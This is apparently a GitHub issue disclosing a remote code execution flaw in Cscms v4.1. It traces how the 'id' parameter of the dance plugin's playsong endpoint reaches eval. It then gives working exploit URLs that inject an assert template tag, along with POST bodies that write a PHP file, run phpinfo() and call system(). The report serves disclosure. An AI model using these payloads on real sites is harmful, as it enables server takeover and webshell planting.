You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
//play songpublicfunctionindex(){
$ids=$this->input->get('id',TRUE);
if(empty($ids)){
$sqlstr="select id from ".CS_SqlPrefix."dance order by rand() desc LIMIT 30";
$result=$this->db->query($sqlstr);
$recount=$result->num_rows();
if($recount>0){
foreach ($result->result() as$row) {
$ids.=$row->id.",";
}
}
}
if(substr($ids,-1)==",") $ids=substr($ids,0,-1);
$zdy['{cscms:lbid}'] = $ids;
//Load template and output$this->Cstpl->plub_show('dance',array(),$ids,FALSE,'playsong.html','音乐盒 - '.Web_Name,'','','',$zdy);
}
Get the id parameter here and assign it to the array $ zdy , and bring it into the function plub_show .
this->Cstpl->plub_show('dance',array(),$ids,FALSE,'playsong.html','音乐盒 - '.Web_Name,'','','',$zdy);
Follow up this function and find that the $ zdy (ie $ fidetpl) we passed in will be analyzed and added to the $ Mark_Text variable
$return==FALSE entered the branch and executed
$this->Csskins->labelif($Mark_Text);
Follow up this function and find that the labelif2 function is called on the first line. Perform some judgments and finally execute the eval function, resulting in code execution.
1、Vulnerability summary
Vulnerability name:Cscms V4.1 has code execution vulnerabilities
Report date: 2020-04-13
Exploit Author: Zhou Zi Qiao
Product Home: http://www.chshcms.com/down.html
Software link: http://www.chshcms.com/down.html
Version:v4.1
2、Vulnerability overview
Vulnerability file:\cscms4.1\plugins\dance\Playsong.php
Vulnerability function:index
Get the id parameter here and assign it to the array $ zdy , and bring it into the function plub_show .
this->Cstpl->plub_show('dance',array(),$ids,FALSE,'playsong.html','音乐盒 - '.Web_Name,'','','',$zdy);
Follow up this function and find that the $ zdy (ie $ fidetpl) we passed in will be analyzed and added to the $ Mark_Text variable
There is such a judgment at the end
$return==FALSE entered the branch and executed
$this->Csskins->labelif($Mark_Text);
Follow up this function and find that the labelif2 function is called on the first line. Perform some judgments and finally execute the eval function, resulting in code execution.
3、vulnerability exploitation
http://localhost/index.php/dance/playsong/index
Front-end getshell (need to open the dance section)
payload:http://localhost/index.php/dance/playsong/index?id=1,2,3{toif:assert($_POST[1])}{end toif}
post:1=file_put_contents('./packs/admin/atest.php','')
Create a test file in the specified folder and write the specified code
or payload:http://127.0.0.45/index.php/dance/playsong/index?id=1,2,3{toif:assert($_POST[1])} 112 {end toif}
post:
1=phpinfo()
1=system("dir")
we can see that the code is executed
The text was updated successfully, but these errors were encountered: